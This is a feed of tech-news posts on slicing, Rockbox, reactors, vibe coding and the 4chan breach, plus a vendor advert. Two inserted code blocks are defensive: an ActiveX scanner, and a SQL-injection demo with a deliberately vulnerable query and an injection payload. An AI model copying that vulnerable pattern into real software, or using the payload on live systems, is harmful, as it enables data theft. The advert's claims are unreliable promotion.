Quite a lot of math is done to use these paths to calculate a deformation mesh, and we’ll leave that to [Joshua] to explain in his video below. After applying the deformation, he slices the resulting mesh in Cura, before the G-code goes back to Jupyter to be re-transformed, restoring the shape of the original mesh.
… to generate deformed models for slicing, like this.
So yes, it is G-code bending as others have demonstrated before, but in a reproducible, streamlined, and straightforward workflow. Indeed, [Josh] credits much of the work to earlier work on the S^3-Slicer, which inspired much of the logic and the name behind his S4 slicer. (Not S4 as in “more than S^3” but S4 as a contraction of “Simplified S^3”). Once again, open source allows for incremental innovation.

It is admittedly a computationally intensive process, and [Joshua] uses a simplified model of Benchy for this demo. This seems exactly the sort of thing we’d like to burn compute power on, though.

This sort of non-planar 3D printing is an exciting frontier, one which we have covered before. We’ve seen techniques for non-planar infill, or even to print overhangs on unmodified Cartesian printers, but this is probably the first time we’ve seen Benchy given the non-planar treatment. You can try S4 slicer for yourself via GitHub, or just watch the non-planar magic in action after the break.

youtube.com/embed/M51bMMVWbC8?…


hackaday.com/2025/04/20/non-pl…


Rockbox 4.0 Released


This is the Rockbox logo banner.

It’s traditional to launch new software on April Fool’s Day, which is when we heard that Rockbox 4.0 has been released. But, in this case, the venerable MP3 firmware actually did update after a long absence. It’s great to see that good old Rockbox is still kicking along. We first mentioned Rockbox here at Hackaday approaching 20 years ago. How time flies. There used to be a whole ‘scene’ around hacking Personal Media Players (PMPs), also known as “MP3 Players”.

We tracked down Rockbox contributor [Solomon Peachy] to ask for some simple advice: If someone wants to install Rockbox on a personal media player today, what hardware should they buy? [Solomon] referred us to the AIGO EROS Q / EROS K, which is the only compatible hardware still being manufactured and sold. Beyond that, if you want to buy compatible hardware, you’ll need to find some secondhand somewhere, such as eBay. See the Rockbox Wiki for supported hardware.

Smartphones and streaming services have subsumed the single-purpose personal media player. Will you put the new Rockbox on something? Let us know in the comments.

youtube.com/embed/zooD_rVjzm4?…


hackaday.com/2025/04/19/rockbo…


Frankenflair 58: Manual Roots, Advanced Brew


The user interface of the things we deal with often makes or breaks our enjoyment of using a device. [Janne] from Fraktal thinks so too: he has an espresso machine he enjoys, but the default controls were not what he was looking for, and so in true hacker fashion he took what was there and made it his own.

This Kickstarter-born Flair 58 is a manual espresso machine with minimal moving parts and no electronics in its default configuration. An optional preheater was available, but it felt like an afterthought. He decided to add a bit more finesse with his solution: a sleek touchscreen display controlling a custom heater board with closed-loop temperature control, and provisions to connect an external scale for precise pour measurements. We’ve seen coffee maker hacks before, but this one certainly stands out for adding features absent from the machine’s initial design.

To accommodate the two custom PCBs and the touchscreen, [Janne] modified the machine’s frame. The Flair 58’s swooping curves posed a challenge, but instead of using an external enclosure, he shaped the PCBs to fit seamlessly within the machine’s structure. A wonderfully done hack given the open, exposed design of the base hardware.

Certainly head over to his site and check out this beautiful solution to improving on an existing device, and check out his other cool project based around laser fault injection. All the hardware and software for this project is freely available over on his site so if you’d like to upgrade your machine be sure to go check it out.


hackaday.com/2025/04/19/franke…


China’s TMSR-LF1 Molten Salt Thorium Reactor Begins Live Refueling Operations


The TMSR-LF1 building seen from the sky. (Credit: SINAP)

Although uranium-235 is the typical fuel for commercial fission reactors on account of it being fissile, it’s relatively rare compared to the fertile U-238 and thorium (Th-232). Using either of these fertile isotopes to breed new fuel from is thus an attractive proposition. Despite this, only India and China have a strong focus on using Th-232 for reactors, the former using breeders (Th-232 to U-233) to create fissile uranium fuel. China has demonstrated its approach — including refueling a live reactor — using a fourth-generation molten salt reactor.

The original research comes from US scientists in the 1960s. While there were tests in the MSRE reactor, no follow-up studies were funded. The concept languished until recently, with Terrestrial Energy’s Integral MSR and construction on China’s 2 MW TMSR-LF1 experimental reactor commencing in 2018 before first criticality in 2023. One major advantage of an MSR with liquid fuel (the -LF part in the name) is that it can filter out contaminants and add fresh fuel while the reactor is running. With this successful demonstration, along with the breeding of uranium fuel from thorium last year, a larger, 10 MW design can now be tested.

Since TMSR doesn’t need cooling water, it is perfect for use in arid areas. In addition, China is working on using a TMSR-derived design in nuclear-powered container vessels. With enough thorium around for tens of thousands of years, these low-maintenance MSR designs could soon power much of modern society, along with high-temperature pebble bed reactors, which is another concept that China has recently managed to make work with the HTR-PM design.

Meanwhile, reactors are getting smaller in general.


hackaday.com/2025/04/19/chinas…


Goodbye ActiveX! Microsoft pulls the plug on the malware dinosaur


Microsoft has said it will begin disabling ActiveX controls in the Windows versions of the Microsoft 365 and Office 2024 apps by the end of the month. ActiveX dates back to 1996 and is a legacy framework that lets developers create interactive objects that can be embedded in Office documents.

Once the changes are rolled out, ActiveX is expected to be blocked entirely in Word, Excel, PowerPoint and Visio, without prompting the user to enable it. This should reduce the risk of malware infection and unauthorised code execution.

When a document containing ActiveX controls is opened, a notification at the top of the window will state that the ActiveX content in the file has been blocked, alongside a “Learn more” button.

In a separate bulletin, Microsoft also warned Office users not to open unknown attachments or change ActiveX settings when they receive pop-ups or requests from people they do not know. “When ActiveX is disabled, you will no longer be able to create or interact with ActiveX objects in Microsoft 365 files. Some existing ActiveX objects will still be visible as a static image, but it will not be possible to interact with them,” Microsoft says.

Re-enabling ActiveX controls will be possible through the Trust Center, and doing so enables ActiveX in all Office applications, including Word, PowerPoint, Excel and Visio. At the same time, Microsoft stresses that “for optimal security, we strongly recommend disabling ActiveX controls unless absolutely necessary”.

The decision to disable ActiveX by default is most likely driven by its well-known security problems, including zero-day vulnerabilities exploited by hacking groups to deliver malware. For example, criminals have abused ActiveX controls embedded in Word documents to compromise corporate networks and gain a foothold, deploying the TrickBot malware and Cobalt Strike beacons.
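A detection-side example added here (not from the article, and not Microsoft's tooling): an Office document is a zip of XML parts, and Word stores an embedded ActiveX control as `word/activeX/activeXN.xml` plus a `.bin` part, declares them in `[Content_Types].xml` with the `application/vnd.ms-office.activeX` content types, and references them from the body with a `<w:control>` element. The scanner below looks for those three markers without opening the file in Office, so a mail gateway or triage script can flag such documents before anyone is tempted to click through the blocked-content bar. The sample packages are constructed in memory and are deliberately minimal, not real Word output.

```python
import io
import re
import zipfile

# Content types Word writes for ActiveX parts: the activeX*.xml description
# parts ("+xml") and the binary activeX*.bin persistence parts.
ACTIVEX_CT_RE = re.compile(r'ContentType="(application/vnd\.ms-office\.activeX[^"]*)"')
# <w:control .../> in a document body references an ActiveX part via a relationship.
CONTROL_RE = re.compile(r"<(?:\w+:)?control\b")


def scan_ooxml(data: bytes) -> dict:
    """Look for ActiveX markers in an OOXML package (docx/xlsx/pptx) without rendering it."""
    report = {"activex_parts": [], "declared_types": [], "control_refs": 0}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        report["activex_parts"] = sorted(n for n in names if "/activex/" in n.lower())
        if "[Content_Types].xml" in names:
            ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
            report["declared_types"] = sorted(set(ACTIVEX_CT_RE.findall(ct)))
        for part in names:
            # Count control references in the XML parts outside the activeX folder itself.
            if part.endswith(".xml") and "/activex/" not in part.lower():
                xml = z.read(part).decode("utf-8", "replace")
                report["control_refs"] += len(CONTROL_RE.findall(xml))
    return report


def has_activex(data: bytes) -> bool:
    """True if any of the three markers is present; each alone is enough to flag the file."""
    r = scan_ooxml(data)
    return bool(r["activex_parts"] or r["declared_types"] or r["control_refs"])


def build_sample(with_activex: bool) -> bytes:
    """Constructed, minimal docx-like package for the demonstration (not a real Word file)."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    types = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
        '<Default Extension="xml" ContentType="application/xml"/>',
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>',
    ]
    control = ""
    if with_activex:
        types += [
            '<Default Extension="bin" ContentType="application/vnd.ms-office.activeX"/>',
            '<Override PartName="/word/activeX/activeX1.xml" ContentType="application/vnd.ms-office.activeX+xml"/>',
        ]
        control = '<w:r><w:object><w:control r:id="rId5" w:name="Control1"/></w:object></w:r>'
    types.append("</Types>")
    body = (f'<w:document xmlns:w="{w_ns}" xmlns:r="{r_ns}"><w:body>'
            f'<w:p>{control}<w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "\n".join(types))
        z.writestr("word/document.xml", body)
        if with_activex:
            z.writestr("word/activeX/activeX1.xml",
                       '<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX"/>')
            z.writestr("word/activeX/activeX1.bin", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        print("activex" if flag else "clean  ", scan_ooxml(build_sample(flag)))
```

Checking the zip directory, the content-types manifest and the body separately matters because an attacker can strip one of them: a file whose `[Content_Types].xml` omits the override still carries the part, and a control reference with no backing part is still worth a look.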

Microsoft has previously switched off several Windows and Office features that attackers were using against users. It started in 2018, when Microsoft extended Antimalware Scan Interface (AMSI) support to the Office 365 client applications to counter VBA macro attacks.

Since then the company has begun blocking VBA macros by default, implemented protection for XLM macros, disabled Excel 4.0 (XLM) macros and begun blocking untrusted XLL add-ins by default across all Microsoft 365 environments.

In May 2024, Microsoft announced it would gradually and permanently phase out VBScript, first turning it into a feature on demand and then removing it altogether.

The article Goodbye ActiveX! Microsoft pulls the plug on the malware dinosaur originally appeared on il blog della sicurezza informatica.


They Hacked a Nuclear Power Plant! Whoops! Don’t Make a Sound!


A nuclear coolant tower dwarfs other buildings in the area.

What do you do with an unused nuclear reactor project? In Washington, one of them was hacked to remove sound, all in the name of science.

In 1977, a little way outside of Seattle, Washington Nuclear Projects 3 and 5 (WNP-3 and WNP-5) were started as part of Washington Public Power Supply System (WPPSS, pronounced “whoops”). They ran over budget, and in the 80s they were mothballed even though WNP-3 was nearly complete.

In 2010 when [Ron] and [Bonnie Sauro] were starting their new acoustical lab, NWAA Labs, they thought they wanted to build in a mountain, but what they found was an auxiliary reactor building. The structure was attached to a defunct nuclear power facility. With concrete and rebar walls five feet thick, it was the ideal site for their acoustical experiments and tests.

There are strict facility requirements from standards bodies such as American National Standards Institute (ANSI) and the International Organization for Standardization (ISO) for acoustical labs which help ensure that different labs achieve comparable results. For example, you need stable temperature, humidity, and reverberation. The temperature within the facility is a stable 54 degrees Fahrenheit (12 degrees Celsius) regardless of the temperature outside.

Companies use acoustical labs to inform their designs and ensure that they meet acoustic standards or requirements, particularly those related to noise emissions. Over the last fifteen years, NWAA Labs has tested carpet samples, noise-cancelling headphones, sound-dampening construction materials, noisy washing machines, and even an airplane’s crew cabin!

If there was any question about whether [Ron Sauro] qualifies as a hacker, this quote removes all doubt: “I’m a carpenter, a plumber, a welder, I can fix a car,” he says. “Anything that needs to be done, I can do. Because I have to.”

Maybe we should send a wearable cone of silence to [Ron] for a complete test. If you’ve ever hacked a nuclear power plant, do let us know in the comments!

youtube.com/embed/JoYHPIDRVKw?…


hackaday.com/2025/04/19/they-h…


Hydroplaning RC Jet boat Steers Clear of Convention


HydraJet RC hydroplaning jetboat

[CoraConcepts], who has a background in motorsports, has been busy designing an unconventional radio-controlled watercraft she calls the HydraJet.

There are two key design decisions that make the HydraJet what it is. First, she chose to propel the boat by pushing against the air via an electric ducted fan (EDF) rather than the water via a traditional water propeller. This simplified construction and made it more affordable, partly because she already had the fan on hand.

Her other design choice was to use wings underneath the boat to lift it out of the water. Not as hydrofoils, where the wings ride below the surface of the water, but for hydroplaning, where the wings ride on the surface of the water. Lifting the vehicle out of the water, of course, reduces drag, improving performance as we’ve often seen with high speed watercraft (including RC models) as well as slower bicycle-powered ones. The choice to rely on hydroplaning also reduces the complexity of the design. Certain hydrofoil designs need to make adjustments in order to keep the vehicle at a steady level, whereas hydroplaning wings can use a static angle. Hydrofoils also must overcome challenges to maintain stability.

[CoraConcepts] hopes to eventually scale the HydraJet up large enough to carry human passengers and we’re looking forward to the opportunity to take it for a spin around the lake.

youtube.com/embed/meIueNv_TBg?…

Thanks to [John Little] for the tip!


hackaday.com/2025/04/19/hydrop…


Vibing, AI Style


This week, the hackerverse was full of “vibe coding”. If you’re not caught up on your AI buzzwords, this is the catchy name coined by [Andrej Karpathy] that refers to basically just YOLOing it with AI coding assistants. It’s the AI-fueled version of typing in what you want to StackOverflow and picking the top answers. Only, with the current state of LLMs, it’ll probably work after a while of iterating back and forth with the machine.

It’s a tempting vision, and it probably works for a lot of simple applications, in popular languages, or generally where the ground is already well trodden. And where the stakes are low, as [Al Williams] pointed out while we were talking about vibing on the podcast. Can you imagine vibe-coded ATM software that probably gives you the right amount of money? Vibe-coding automotive ECU software?

While vibe coding seems very liberating and hands-off, it really just changes the burden of doing the coding yourself into making sure that the LLM is giving you what you want, and when it doesn’t, refining your prompts until it does. It’s more like editing and auditing code than authoring it. And while we have no doubt that a stellar programmer like [Karpathy] can verify that he’s getting what he wants, write the correct unit tests, and so on, we’re not sure it’s the panacea that is being proclaimed for folks who don’t already know how to code.

Vibe coding should probably be reserved for people who already are expert coders, and for trivial projects. Just the way you wouldn’t let grade-school kids use calculators until they’ve mastered the basics of math by themselves, you shouldn’t let junior programmers vibe code: It simultaneously demands too much knowledge to corral the LLM, while side-stepping any of the learning that would come from doing it yourself.

And then there’s the security side of vibe coding, which opens up a whole attack surface. If the LLM isn’t up to industry standards on simple things like input sanitization and parameterized queries, your vibed code probably shouldn’t be anywhere near the Internet.
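An added example of the kind of thing the "auditing" role has to catch, written for this page rather than taken from the newsletter or from any assistant's output: the first lookup builds its SQL from the caller's string, which is the shape an assistant tends to produce when nobody asks for safety; the second binds the value as a parameter. A crude source audit follows, flagging `execute()` calls whose SQL is assembled with an f-string, `%` formatting or `+` concatenation, which is the sort of check a human overseer can run over generated code before trusting it. The table rows and the audited source lines are constructed for the demo.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str):
    """String-built query: whatever the caller passes becomes part of the SQL text."""
    return conn.execute(f"SELECT name, role FROM users WHERE name = '{name}'").fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str):
    """Parameterised query: the driver binds the value, so it is never parsed as SQL."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


# Heuristic only: flags execute()/executemany() whose first argument is an f-string,
# or whose argument list contains + or % before the closing parenthesis.  A literal
# '%' in a LIKE pattern would also trip it, so treat hits as review prompts, not verdicts.
_STRING_BUILT_SQL = re.compile(r'\.execute(?:many)?\(\s*(?:f["\']|[^)]*[+%])')


def audit_sql(source: str):
    """Return 1-based line numbers of execute() calls that appear to build SQL from strings."""
    return [i for i, line in enumerate(source.splitlines(), 1)
            if _STRING_BUILT_SQL.search(line)]


# Constructed snippet standing in for assistant output under review.
SAMPLE_SOURCE = "\n".join([
    "rows = conn.execute(f\"SELECT * FROM users WHERE name = '{name}'\").fetchall()",
    "rows = conn.execute(\"SELECT * FROM users WHERE name = '\" + name + \"'\").fetchall()",
    "rows = conn.execute(\"SELECT * FROM users WHERE name = ?\", (name,)).fetchall()",
])


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # both rows leak
    print("safe:      ", lookup_safe(db, payload))         # no match
    print("flagged lines:", audit_sql(SAMPLE_SOURCE))
```

The payload `x' OR '1'='1` turns the string-built query into `WHERE name = 'x' OR '1'='1'`, which matches every row; the bound version compares the whole payload as a name and returns nothing. Prompting the assistant for "the safe version" often produces the second form, but only if the reviewer knows to ask.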

So should you be vibing? Sure! If you feel competent overseeing what [Dan] described as “the worst summer intern ever”, and the stakes are low, then it’s absolutely a fun way to kick the tires and see what the tools are capable of. Just go into it all with reasonable expectations.

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!


hackaday.com/2025/04/19/vibing…


Will it Run Llama 2? Now DOS Can


Two laptops, side by side, running Llama2 in DOS.

Will a 486 run Crysis? No, of course not. Will it run a large language model (LLM)? Given the huge buildout of compute power to do just that, many people would scoff at the very notion. But [Yeo Kheng Meng] is not many people.

He has set up various DOS computers to run a stripped down version of the Llama 2 LLM, originally from Meta. More specifically, [Yeo Kheng Meng] is implementing [Andrej Karpathy]’s Llama2.c library, which we have seen here before, running on Windows 98.

Llama2.c is a wonderful bit of programming that lets one run inference on a trained Llama2 model in only seven hundred lines of C. It is seven hundred lines of modern C, however, so porting to DOS 6.22 and the outdated i386 architecture took some doing. [Yeo Kheng Meng] documents that work, and benchmarks a few retrocomputers. As painful as it may be to say — yes, a 486 or a Pentium 1 can now be counted as “retro”.

The models are not large, of course, with a TinyStories-trained 260 kB model churning out a blistering 2.08 tokens per second on a generic 486 box. Newer machines can run larger models faster, of course. Ironically a Pentium M Thinkpad T24 (was that really 21 years ago?) is able to run a larger 110 MB model faster than [Yeo Kheng Meng]’s modern Ryzen 5 desktop. Not because the Pentium M is going blazing fast, mind you, but because a memory allocation error prevented that model from running on the modern CPU. Slow and steady finishes the race, it seems.

This port will run on any 32-bit i386 hardware, which leaves the 16-bit regime as the next challenge. If one of you can get a Llama 2 hosted locally on a 286 or a 68000-based machine, then we may have to stop asking “Does it run DOOM?” and start asking “Will it run an LLM?”

youtube.com/embed/4241obgG_QI?…


hackaday.com/2025/04/19/will-i…


Open Source DMR Radio


While ham radio operators have been embracing digital mobile radio (DMR), the equipment is most often bought since — at least in early incarnations — it needs a proprietary CODEC to convert speech to digital and vice versa. But [QRadioLink] decided to tackle a homebrew and open source DMR modem.

The setup uses a LimeSDR, GNU Radio, and Codec2. There are some other open DMR projects, such as OpenRTX. So we are hopeful there are going to be more choices. The DMR modem, however, is only a proof-of-concept and reuses the MMDVMHost code to do the data link layer.

[QRadioLink] found several receiver implementations available, but only one other DMR transmitter — actually, a transceiver. Rather than use an AMBE hardware device or the potentially encumbered mbelib codec, the project uses Codec2 which is entirely open source.

There’s a lot of explanation about the data collection to prepare for the project, and then a deep dive into the nuts and bolts of the implementation. You might enjoy the video below to see things in action.

If you just want to listen to DMR, it’s easy. If Codec2 sounds familiar, it is part of M17.

youtube.com/embed/h4YrMieKY3Y?…


hackaday.com/2025/04/19/open-s…


4chan hacked! The birthplace of Anonymous may shut down for good


The 4chan imageboard has been practically down since Monday evening (14 April), apparently because of a hack. Members of the Soyjak party imageboard (also known simply as The Party) claim to be behind the attack.

The attack on 4chan


To back up their claim, Party members posted screenshots of the admin panels, of a restored /qa/ board and of one that had vanished, user-ban templates, and a list of email addresses believed to belong to 4chan’s administrators, moderators and “janitors” (less privileged mods who help keep the boards clean).

“Tonight was a special night for many of us on the soyjak party. Today, 14 April 2025, a hacker who had been inside 4chan’s system for over a year carried out a soyclipse operation, reopened /qa/, exposed personal information of 4chan employees and leaked code from the site,” reports Chud, a Party member. “In an attempt to deal with the fallout, 4chan’s administrators shut down all the servers, but there are unconfirmed reports that the servers are already fully compromised and will not be able to operate for some time.”

In the same thread, Chud shared several screenshots showing how a hacker gained access to 4chan’s admin panels and staff tools.

With these tools it was possible to find out the location and IP address of any user, rebuild or restart all of 4chan’s boards, read the logs, view site statistics and manage the database through phpMyAdmin.

The hackers have not revealed exactly how access to 4chan’s systems was obtained. It is believed the site may have been compromised because it was running an outdated version of PHP dating from 2016 and vulnerable to several known issues.

At the moment 4chan occasionally loads in text-only mode, but most of the time it does not work at all and shows Cloudflare timeout errors.

Remembering 4chan and why it was so influential


4chan was born in 2003 as a simple imageboard aimed mainly at fans of anime and Japanese culture, created by a young American known online as “moot” (Christopher Poole). In a short time, though, the site turned into something much bigger: a chaotic forge of memes, irreverent humour, NSFW content and viral stunts. The fully anonymous forum let anyone post without registering, giving rise to a free, unpredictable and at times deeply disturbing subculture that would shape the aesthetics and narrative of the Internet for years.

Among the various boards, the most famous (and infamous) was /b/, the “random” section where every rule was constantly broken. It was there that Anonymous was born, the collective with no face and no leader, formed by users fed up with censorship, manipulation and centralised power. The name “Anonymous” came from the fact that every post by an unregistered user appeared under that signature. From that base, a growing number of users began to think and act as a collective mind, launching campaigns, pranks and, above all, operations that would have a global impact.

One of the first historic operations was “Project Chanology” in 2008, a worldwide protest against the Church of Scientology, accused of censorship after trying to remove an embarrassing Tom Cruise video from the Internet. Anonymous responded with DDoS attacks, prank calls, sit-ins outside the church’s premises and video manifestos that became iconic. The operation marked the shift from simple online trolling to coordinated, ideologically charged actions, often tied to defending freedom of expression and fighting institutions perceived as oppressive.

Numerous operations followed in later years, including “Operation Payback” against companies that had boycotted WikiLeaks, and campaigns in support of the Arab Spring. Even if 4chan has lost much of its original cultural weight today, there is no denying that it left a deep and indelible mark on the history of the Internet.

It was the crossroads of anonymity, activism and viral creativity, giving rise to a movement that still echoes today in many forms of modern hacktivism.

The article 4chan hacked! The birthplace of Anonymous may shut down for good originally appeared on il blog della sicurezza informatica.


Restoring an Abandoned Game Boy Kiosk


Back in the olden days, there existed physical game stores, which in addition to physical games would also have kiosks where you could try out the current game consoles and handhelds. Generally these kiosks held the console, a display and any controllers if needed. After a while these kiosks would get scrapped, with only a very few ending up being rescued and restored. One of the lucky ones is a Game Boy kiosk, which [The Retro Future] managed to snag after it was found in a construction site. Sadly the thing was in a very rough condition, with the particle board especially being mostly destroyed.
Display model Game Boy, safely secured into the demo kiosk. (Credit: The Retro Future, YouTube)
These Game Boy kiosks also featured a special Game Boy, which – despite being super rare – was also hunted down. This led to the restoration, which included recovering as much of the original particle board as possible, with a professional furniture restorer ([Don]) lending his expertise. This provides a master class in how to patch up damaged particle board, as maligned as this wood-dust-and-glue material is.

The boards were then reassembled more securely than the wood screws used by the person who had found the destroyed kiosk, in a way that allows for easy disassembly if needed. Fortunately most of the plastic pieces were still intact, and the Game Boy grey paint was easily matched. Next was reproducing a missing piece of art work, with fortunately existing versions available as reference. For a few missing metal bits that held the special Game Boy in place another kiosk was used to provide measurements.

After all this, the kiosk was powered back on, and it was like 1990 was back once again, just in time for playing Tetris on a dim, green-and-black screen while hunched half into the kiosk at the game store.

youtube.com/embed/1Y2ao4gwWqg?…


hackaday.com/2025/04/18/restor…


Haircuts in Space: How to Keep Your Astronauts Looking Fresh



NASA astronaut Catherine Coleman gives ESA astronaut Paolo Nespoli a haircut in the Kibo laboratory on the ISS in 2011. (Credit: NASA)
Although we tend to see mostly the glorious and fun parts of hanging out in a space station, the human body will not cease to do its usual things, whether it involves the digestive system, or even something as mundane as the hair that sprouts from our heads. After all, we do not want our astronauts to return to Earth after a half-year stay in the ISS looking as if they got marooned on an uninhabited island. Introducing the onboard barbershop on the ISS, and the engineering behind making sure that after a decade the ISS doesn’t positively look like it got the 1970s shaggy wall carpet treatment.

The basic solution is rather straightforward: an electric hair clipper attached to a vacuum that will whisk the clippings safely into a container rather than being allowed to drift around. In a way this is similar to the vacuums you find on routers and saws in a woodworking shop, just with more keratin rather than cellulose and lignin.

On the Chinese Tiangong space station they use a similar approach, with the video showing how simple the system is, little more than a small handheld vacuum cleaner attached to the clippers. Naturally, you cannot just tape a vacuum cleaner to some clippers and expect it to catch most of the clippings, which is why both the ISS and Tiangong solutions seem to have a carefully designed construction to maximize hair removal. You can see the ISS system in action in this 2019 video from the Canadian Space Agency.

Of course, this system is not perfect, but amidst the kilograms of shed skin particles from the crew, a few small hair clippings can likely be handled by the ISS’ air treatment systems just fine. The goal after all is to not have a massive expanding cloud of hair clippings filling up the space station.


hackaday.com/2025/04/18/haircu…


Robot Picks Fruit and Changes Light Bulbs with Measuring Tape


The GRIP-tape robot picking a lemon

How far can you stretch a measuring tape before it buckles? The answer probably depends more on the tape than the user, but it does show how sturdy the coiled spring steel rulers can be. [Gengzhi He et. al.] may have been playing that game in the lab at UC San Diego when they hit upon the idea for a new kind of low-cost robotic gripper.
Figure: the GRIP-tape gripper, showing the tape-loop fingers. Four motors, four strips of measuring tape (doubled up), one robot hand.
With the lovely backronym “GRIP-tape” — standing for Grasping and Rolling in Plane — you get a sense for what this effector can do. Its two “fingers” are each made of loops of doubled-up measuring tape bound together with what looks suspiciously like duck tape. With four motors total, the fingers can be lengthened or shortened by spooling the tape, allowing a reaching motion, pivot closer or further apart for grasping, and move-in-place like conveyor belts, rotating the object in their grasp.

The combination means it can reach out, grab a light bulb, and screw it into a socket. Or open and decant a jar of spices. Another video shows the gripper reaching out to pick a lemon, and gently twist it off the tree. It’s quite a performance for a device with such modest components.

At the moment, the gripper is controlled via remote; the researchers plan on adding sensors and AI autonomous control. Read all the details in the preprint, or check below the fold to watch the robot in action.

This is hardly the first time we’ve highlighted a grabby robot. We’ve seen belts, we’ve seen origami — but this is the first time we’ve seen a measuring tape. Have you seen a cool robot? Toss us a tip. We’d love to hear from you.

youtube.com/embed/l0mCA19y0zQ?…

youtube.com/embed/SP7X8TpNhmw?…

Tip of the hat to reader [anonymouse] for pointing this one out.


hackaday.com/2025/04/18/robot-…


Discover Cubbit’s Partner Program for MSPs


If you are a Managed Service Provider (MSP) or an IT consultant, there is a new opportunity that could transform your business: Cubbit’s Partner Program.

Why choose Cubbit’s Partner Program


Cubbit, a pioneer of the geo-distributed cloud in Europe, has developed an exclusive Partner Program designed to help you stand out in today’s competitive market. The initiative not only lets you multiply your profit margins up to three times the industry average, but also offers a set of unique benefits designed to support your growth and that of your customers.

The benefits waiting for you


  • Maximise your profits: Thanks to favourable commercial terms and highly competitive pricing, you will have the opportunity to increase your margins significantly.
  • Dedicated, high-level support: Benefit from specialised technical assistance, personalised sales support and advanced co-marketing tools to expand your market presence.
  • Advanced control panel: An intuitive dashboard lets you monitor your customers’ storage usage, generate detailed reports and customise the console for more efficient management.
  • Access to the Partner Portal: Get exclusive resources such as the deal-registration system that rewards your sales, and ready-made marketing kits to launch promotional campaigns in record time.
  • Training and certifications: Take part in certified training programmes on Cubbit technology to build advanced skills and offer high-level solutions to your customers.


Cubbit: the geo-distributed cloud for MSPs


Since 2016, Cubbit has revolutionized the concept of cloud storage, earning the trust of over 350 companies in Europe, including well-known brands such as Exclusive Networks, Leonardo, Granarolo, Amadori and numerous public administrations.

A unique technology


Cubbit stands out for its geo-distributed architecture. This innovative approach offers an unprecedented level of security:

  • AES-256 encryption: Your data is encrypted with a military-grade cryptographic standard.
  • Fragmentation and redundancy: The encrypted data is split into fragments and replicated to guarantee maximum security.
  • Geo-distribution: The encrypted, fragmented data is replicated across several geographic sites within a country of your choosing. This is what sets Cubbit apart: the data never resides in a single place, ensuring digital sovereignty and an unprecedented level of resilience.


Compliance and digital sovereignty


Cubbit is fully compliant with European regulations such as GDPR and NIS2. Its geofencing technology lets you specify exactly where data must be stored, meeting national sovereignty requirements. This means offering your customers a secure, hyper-resilient cloud solution, capable of withstanding ransomware attacks and natural disasters without compromising on sovereignty or regulatory compliance.

Cubbit has also obtained prestigious international certifications, including:

  • ISO 9001:2015 (Quality management)
  • ISO/IEC 27001:2013 (Information security)
  • ISO/IEC 27017:2015 (Cloud security)
  • ISO/IEC 27018:2019 (Protection of personal data in the cloud)

Cubbit has also been awarded the “Cybersecurity Made in Europe” label and is ACN-qualified, making its services available to public institutions through the MePa platform.

Next-level security


With data durability of up to 15 nines, Cubbit offers protection ten thousand times greater than traditional cloud services. The geo-distributed architecture eliminates the risk of downtime and single points of failure. Even if one of the network's nodes goes down, the data remains accessible at all times thanks to automatic redistribution of the fragments.

Features such as versioning and object lock further protect the data:

  • Versioning: Keeps several versions of a file, making recovery after a ransomware attack easier without having to pay a ransom.
  • Object lock: Prevents unauthorized changes or deletions for a period of time defined by the user.


Flexibility and efficiency without surprises


Compatible with the S3 protocol, Cubbit allows immediate integration without changing existing software or processes. It also offers automatic off-site backups and long-term archiving options, guaranteeing operational efficiency without hidden costs such as egress fees. Transparent pricing ensures predictable costs.

Join the Cubbit Partner Program


This is the opportunity for Italian IT consultants and MSPs to stand out in the market with an innovative cloud solution developed entirely in Italy. Increase your margins, strengthen your competitiveness and offer your customers a cloud service that is more secure, hyper-resilient and compliant with regulations.

Contact Cubbit today to find out how to join the Cubbit Partner Program and take your business to the next level.

The article Discover Cubbit's Partner Program for MSPs comes from il blog della sicurezza informatica.


A Pi-Based LiDAR Scanner


Although there are plenty of methods for effectively imaging a 3D space, LiDAR is widely regarded as one of the most effective methods. These systems use a rapid succession of laser pulses over a wide area to create an accurate 3D map. Early LiDAR systems were cumbersome and expensive but as the march of time continues on, these systems have become much more accessible to the average person. So much so that you can quickly attach one to a Raspberry Pi and perform LiDAR imaging for a very reasonable cost.

This software suite is a custom serial driver and scanning system for the Raspberry Pi, designed to work with LDRobot LiDAR modules like the LD06, LD19, and STL27L. Although still in active development, it offers an impressive set of features: real-time 2D visualizations, vertex color extraction, generation of 360-degree panoramic maps using fisheye camera images, and export capabilities for integration with other tools. The hardware setup includes a stepper motor for quick full-area scanning, and power options that include either a USB battery bank or a pair of 18650 lithium cells—making the system portable and self-contained during scans.

LiDAR systems are quickly becoming a dominant player for anything needing to map out or navigate a complex 3D space, from self-driving cars to small Arduino-powered robots. The capabilities a system like this brings are substantial for a reasonable cost, and we expect to see more LiDAR modules in other hardware as the technology matures further.

Thanks to [Dirk] for the tip!


hackaday.com/2025/04/18/a-pi-b…


Vintage Game Rides Again Thanks to Modern Tech


